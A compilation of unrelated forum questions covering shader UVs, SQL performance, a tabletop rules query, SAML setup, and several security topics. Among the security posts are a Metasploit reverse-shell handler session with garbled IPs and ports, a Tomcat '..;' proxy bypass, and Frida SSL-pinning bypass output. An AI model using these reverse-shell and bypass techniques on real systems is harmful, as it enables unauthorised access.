Per-object screen space uv issue

I am currently trying to sample a texture in screen space. This works well :

float4 positionCS = vertexInput.positionCS / vertexInput.positionCS.w; screenPos = ComputeScreenPos(positionCS).xy; float aspect = _ScreenParams.x / _ScreenParams.y; screenPos.x = screenPos.x * aspect; 

But I would like to be able to constrain uv position and scale based on object’s position and distance from camera. I found some example but I also faced some issues and for the moment I don’t see how to fix them. Here’s the code :

float4 positionCS = vertexInput.positionCS / vertexInput.positionCS.w; screenPos = ComputeScreenPos(positionCS).xy; float aspect = _ScreenParams.x / _ScreenParams.y; screenPos.x = screenPos.x * aspect;  float4 originCS = TransformObjectToHClip(float3(0.0, 0.0, 0.0)); originCS = originCS / originCS.w; float2 originSPos = ComputeScreenPos(originCS).xy; originSPos.x = originSPos.x * aspect; screenPos = screenPos - originSPos;  // You can match object's distance like this float3 cameraPosWS = GetCameraPositionWS(); float3 originPosWS = TransformObjectToWorld(float4(0.0, 0.0, 0.0, 1.0)); float d = distance(float4(0.0, 0.0, 0.0, 0.0), cameraPosWS - originPosWS); screenPos *= d; 

And here’s the issue I am facing. You can notice that when the object is near screen edges the texture starts to move. Is there a way to avoid that ?

I am using URP but this doesn’t really matter.

Metasploit: Issue with upgrading a low privilege shell (sessions -u)

Setup info: I don’t believe this is the issue as I regularly update my system. I’ll add one piece of information as an example. If you would really like to the rest then I can add more in later

metasploit v5.0.89-dev

Payload: I used a custom python script to create a reverse shell from the victim’s computer to the attacker. No problem with the low priv shell in netcat or metasploit. If anyone wants to take a look at the script I can upload it to github and share the link(thought its nothing special, I’d prefer to send the link privately to keep the script as less spread as possible).

Exact Steps I took:

msf5 > use multi/handler msf5 exploit(multi/handler) > set payload windows/x64/shell_reverse_tcp payload => windows/x64/shell_reverse_tcp msf5 exploit(multi/handler) > set LPORT 549  LPORT => 443 msf5 exploit(multi/handler) > set LHOST 10.8.210.314 LHOST => 10.9.139.110 msf5 exploit(multi/handler) > run  [*] Started reverse TCP handler on 10.9.139.110:443  [*] Command shell session 1 opened (10.9.139.110:443 -> 10.9.0.1:50071) at 2020-05-30 22:31:25 -0400   Login: password You have a shell have fun #> background  Background session 1? [y/N]  y msf5 exploit(multi/handler) > sessions -u 1 [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]  

The Issue:

[*] Upgrading session ID: 1 [*] Starting exploit/multi/handler [*] Started reverse TCP handler on 10.9.139.110:4433  [-] Post failed: NoMethodError undefined method `reverse!' for nil:NilClass [-] Call stack: [-]   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:136:in `shell_command_token_win32' [-]   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:84:in `shell_command_token' [-]   /usr/share/metasploit-framework/lib/msf/core/post/common.rb:147:in `cmd_exec' [-]   /usr/share/metasploit-framework/lib/msf/core/post/windows/powershell.rb:32:in `have_powershell?' [-]   /usr/share/metasploit-framework/modules/post/multi/manage/shell_to_meterpreter.rb:161:in `run'  

Note: I have taken a look at some of the files, but they seem to be coded in ruby(something I am not familiar with) and the error seems to be related to multiple files, so I have no clue how to really debug this. There also seems to be similar issues posted on github if it helps.

How can I track down an issue with a locked table, endless query?

I have a table that is periodically getting locked in a manner that I don’t quite understand. I cannot do the following:

select * from thetable select count(*) from thetable 

There are roughly 2,000 records.

I can do the following:

select top 2000 * from thetable select * from thetable where ID = etc. 

Going backwards to find a new record that perhaps was problematic, incrementing the count in chunks until I can finally reproduce it again:

select top 1500 * from thetable order by ID desc select top 1550.... etc. and eventually it gets locked and never finishes the query. 

Query never finishes… have waited 10 minutes. Only resolution is to restart the service.

The related stored procedure that I thought caused the problem I ran manually (it interacts with this table) and the longest time it took was roughly 45 seconds. This particular procedure goes through many phases and is wrapped in a transaction with a try/catch/rollback/commit. There is no explicit locking set on the procedure.

Any direction or guidance to track down the root issue is greatly appreciated.

Can a wizard under the effects of Feign Death issue telepathic commands to their familiar?

A wizard has a summoned familiar within 100 feet that is currently idle and has Feign Death cast on them by another PC. Would the wizard still be able to issue telepathic commands to their familiar?

Specifically, while Feign Death states that they appear dead and are incapacitated and blind, they aren’t listed as being unconscious.

Find Familiar doesn’t state that issuing telepathic commands requires an action (which you can’t do while incapacitated), whereas it does state that seeing through your familiar’s eyes requires an action as does dismissing it.

I was DMing a game where this occurred and I hastily ruled that the wizard was unable to issue commands, but I am second guessing myself after the fact. And knowing my PCs this situation is likely to happen again.

A SQL query optimzation issue with ORDER BY

An SQL query optimzation issue with ORDER BY

Current status I have a database of Chess games and their corresponding moves (stored as strings called fens). I have two main tables ‘Game’ and ‘GamePosition’. GamePosition has an index on the fen column and Game has an index on white_elo. I currently have 170471 games and 14813401 positions. I’m running mysql 5.7.28.

Object I’m trying to fetch top rated games based on elo rating of the players. I’ve simplified my query a bit here, but the point and performance problem is the same.

SELECT Game.id FROM Game JOIN GamePosition ON Game.id = game_id WHERE fen = 'rnbqkbnr/pppppppp/8/8/3P4/8/PPP1PPPP/RNBQKBNR' ORDER BY white_elo DESC LIMIT 10 

This query tends to be a bit slow (1.2 s) if I get a lot of results (typically the first move gives 67k+ results). Since I plan to exand the database 10x at least, I want to optimize my query. I’ve run a EXPLAIN which shows that it needs to do a filesort before finding the top rated games on all the results. This seems to be the issue. Removing the ORDER BY from the query makes it superfast (0.0008 s). enter image description here

Any ideas if it’s possible to optimize the query, or if I could store the data differently?

Kind Regards, Bjorn

Path normalization issue with semicolon in Tomcat

I have observed a path normalization issue in the tomcat when i was passing “..;” in the URL. I tested this out with Nginx and Apache-tomcat-10.0.0-M4. I was able to access file directories which are not allowed in the Nginx. Please find the below screenshots for more information,

  1. Nginx Configuration:

Nginx Configuration:

As per the above configuration i have enabled /app/ context path only in Nginx.

  1. I created two directories called App (contains test.html) and App2 (contains test2.html) in the Tomcat ROOT directory.

enter image description here

  1. As per the above Nginx configuration it allows access only to app/test.html. But using semicolon it is possible to access app2/test2.html file as well.

Normal behavior

enter image description here

Behavior with the semicolon

enter image description here

As per the above screenshot, it is allowed to access to the test2.html page via Nginx with semicolon even app2 context path is not define in the Nginx configuration. Also please note that i checked this behavior without the Nginx and it was noted the same behavior. I was able to reproduced this issue directly in the Tomcat 9.0.12 and Tomcat 10.0.0-M4.

enter image description here

enter image description here

Is this already a known issue? or is this the normal behavior in the Tomcat level? A Similar issue has discussed in Blckhat(See below link for more details).

Bypassing SSL pinning Using Frida issue

I am a penetration tester, and i was doing some SSL pinning Bypass using Frida.

I have pushed all the required files, certificates , burp is intercepting traffic from the Android Studio emulator.

i have performed the steps to run frida

[Android Emulator 5554::com.*****.**** ( flagged for ethical security reasons )]-> [.] Cert Pinning Bypass/Re-Pinning [+] Loading our CA... [o] Our CA Info: CN=PortSwigger CA, OU=PortSwigger CA, O=PortSwigger, L=PortSwigger, ST=PortSwigger, C=PortSwigger [+] Creating a KeyStore for our CA... [+] Creating a TrustManager that trusts the CA in our KeyStore... [+] Our TrustManager is ready... [+] Hijacking SSLContext methods now... [-] Waiting for the app to invoke SSLContext.init()... 

And when i try to interact with the application, the application is not allowing my request through because of the missing certificate and frida is not capturing the request and bypassing the pinning knowing that i have performed all the right steps.

I am here if anyone needs to ask more question .. can you please help with the above ?

Issue with SSO SAML2 implementation with Apereo CAS from Sisense

I am facing an issue implementing an SP initiated workflow using Sisense as the SP and Apereo CAS version 5.1.2 as the Idp.

This is the SP metadata

<md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" validUntil="2021-01-28T18:12:42Z" cacheDuration="PT604800S" entityID="https://sisense.domain.com/app/main#/home">   <md:SPSSODescriptor AuthnRequestsSigned="false" WantAssertionsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol">    <md:KeyDescriptor use="signing">       <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">         <ds:X509Data>           <ds:X509Certificate>MIIDGT..</ds:X509Certificate>         </ds:X509Data>       </ds:KeyInfo>     </md:KeyDescriptor>     <md:KeyDescriptor use="encryption">       <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">         <ds:X509Data>           <ds:X509Certificate>MIIDG...</ds:X509Certificate>         </ds:X509Data>       </ds:KeyInfo>     </md:KeyDescriptor>     <NameIDFormat>urn:oasis:names:tc:SAML:2.0:nameid-format:emailAddress</NameIDFormat>     <md:AssertionConsumerService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Location="https://sisense.domain.com/api/v1/authentication/login_saml_callback/" index="1"/>   </md:SPSSODescriptor> </md:EntityDescriptor> 

On the SP side the following configurations are expected.

Remote Login URl – https://cas.com:8443/cas/idp/profile/SAML2/Redirect/SSO

Remote Logout Url – https://cas.com:8443/cas/logout

X509 certificate – certificate from the idp

On the Cas server I have configured the service definition for cas as json

  "@class" : "org.apereo.cas.support.saml.services.SamlRegisteredService",   "serviceId" : "https://sisense.domain.com/app/main#/home",   "name" : "SAMLService",   "id" : 10000012,   "evaluationOrder" : 10,   "metadataLocation" : "https://localhost:8443/cas/etc/cas/saml/sisense_metadata.xml",   "usernameAttributeProvider" :{     "@class" : "org.jasig.cas.services.PrincipalAttributeRegisteredServiceUsernameProvider",     "usernameAttribute" : "cn"   } } 

when the workflow is initiated calling this url https://sisense.domain.com/app/main#/home the SP redirects to the cas SSO endpoint with the following SAMLRequest

<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"                     ID="_6f357780b767b788a3c0"                     Version="2.0"                     IssueInstant="2020-04-28T10:48:35.405Z"                     ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"                     AssertionConsumerServiceURL="https://sisense.domain.com/api/v1/authentication/login_saml_callback/"                     Destination="https://cas.com:8443/cas/idp/profile/SAML2/Redirect/SSO"                     >     <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">https://sisense.domain.com/app/main#/home</saml:Issuer>     <samlp:NameIDPolicy xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"                         Format="urn:oasis:names:tc:SAML:2.0:nameid-format:emailAddress"                         AllowCreate="true"                         />     <samlp:RequestedAuthnContext xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"                                  Comparison="exact"                                  >         <saml:AuthnContextClassRef xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>     </samlp:RequestedAuthnContext> </samlp:AuthnRequest> 

I dont get the login screen for CAS , instead get 500 Internal Server error with error message Handler dispatch failed; nested exception is java.lang.NoSuchMethodError: org.jasig.cas.client.util.CommonUtils.constructServiceUrl(Ljavax/servlet/http/HttpServletRequest;Ljavax/servlet/http/HttpServletResponse;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Z)Ljava/lang/String;

I am unable to proceed, any help is appreciated

Thanks

Issue: Mouse Wheel Up and Down changes the value in a field

hey I have a php website platform. On certain pages there's fields where user can enter values into. Critical amounts with 2 decimal points…

I am finding if the mouse is in a certain positional and if the mouse wheel scrolls up or down it is able to change the value of the 2 decimal point amount!!!

This is a big risk for data input.

Just wondering is there a way to disable or get rid of this for all users that visit the website?